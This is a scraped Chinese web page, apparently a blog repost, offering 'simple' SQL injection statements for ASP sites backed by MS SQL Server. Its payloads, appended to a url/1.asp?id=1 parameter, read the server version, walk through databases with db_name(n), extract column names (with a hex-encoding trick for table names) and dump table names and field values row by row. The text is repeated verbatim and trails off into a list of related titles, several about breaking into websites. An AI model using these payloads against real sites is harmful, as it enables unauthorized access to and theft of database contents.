注入的几条简单语句,不用像网上那样复杂
来源:互联网 发布:中国开国将军秘密知乎 编辑:程序博客网 时间:2024/04/29 04:30
一、版本
url/1.asp?id=1 and @@VERSION>0
二、跨库
url/1.asp?id=1 and 1=(select db_name(n))
n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?
三、列名
url/1.asp?id=1 and 1=(select col_name(object_id('表名'),n) '表名'可以换成16进制。像bbsuser=0x6200620073007500730065007200(不可以去掉0)
四、表名字段值
select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('表名1,表名2'))
字段值:
select top 1 列名 from 表名 where 列名 not in (select top n 列名 from 表名)
n改1,2,3,4就可以得库名、列名
url/1.asp?id=1 and @@VERSION>0
二、跨库
url/1.asp?id=1 and 1=(select db_name(n))
n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?
三、列名
url/1.asp?id=1 and 1=(select col_name(object_id('表名'),n) '表名'可以换成16进制。像bbsuser=0x6200620073007500730065007200(不可以去掉0)
四、表名字段值
select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('表名1,表名2'))
字段值:
select top 1 列名 from 表名 where 列名 not in (select top n 列名 from 表名)
n改1,2,3,4就可以得库名、列名
- 注入的几条简单语句,不用像网上那样复杂
- 注入的几条简单语句,不用像网上那样复杂
- 注入的几条简单语句
- 注入的几条简单语句
- 像QQ那样将最近的几条消息合并到一起
- 单条SQL语句实现复杂逻辑几例
- 像google那样的分页
- iphone里如何实现像图片浏览那样的自动隐藏和导航条和工具栏
- 如何像talking tom那样,自动监听到外部声音,和,简单的变声_1
- 如何像talking tom那样,自动监听到外部声音,和,简单的变声_2
- 如何像talking tom那样,自动监听到外部声音,和,简单的变声_3
- 像百度那样的智能感知效果
- 像IDE那样调整控件的大小
- 几条赋值语句的地址分析
- asp.net 几条有用的语句
- 几条使用率最高的SQL语句
- 几条有用的Sql语句
- 收藏几条有用的SQL语句
- SQL注入葵花宝典(基础篇)
- 上路了!
- PHP生成的XML文件
- 从轻松掌控中国教育部旗下2000多网站想到的安全防范
- Unicode与字符集函数
- 注入的几条简单语句,不用像网上那样复杂
- 入侵网站必备Sql语句:(经典语句)
- SQL注入时快速获得WEB根目录
- 利用ODBC注入
- 关于Jakarta-Commons下载使用的问题
- SQL注入另类技巧
- SQL注入不完全思路与防注入程序
- SQL中数据类型和Ole数据类型中的对应关系
- 来自MIT人工智能实验室:如何做研究
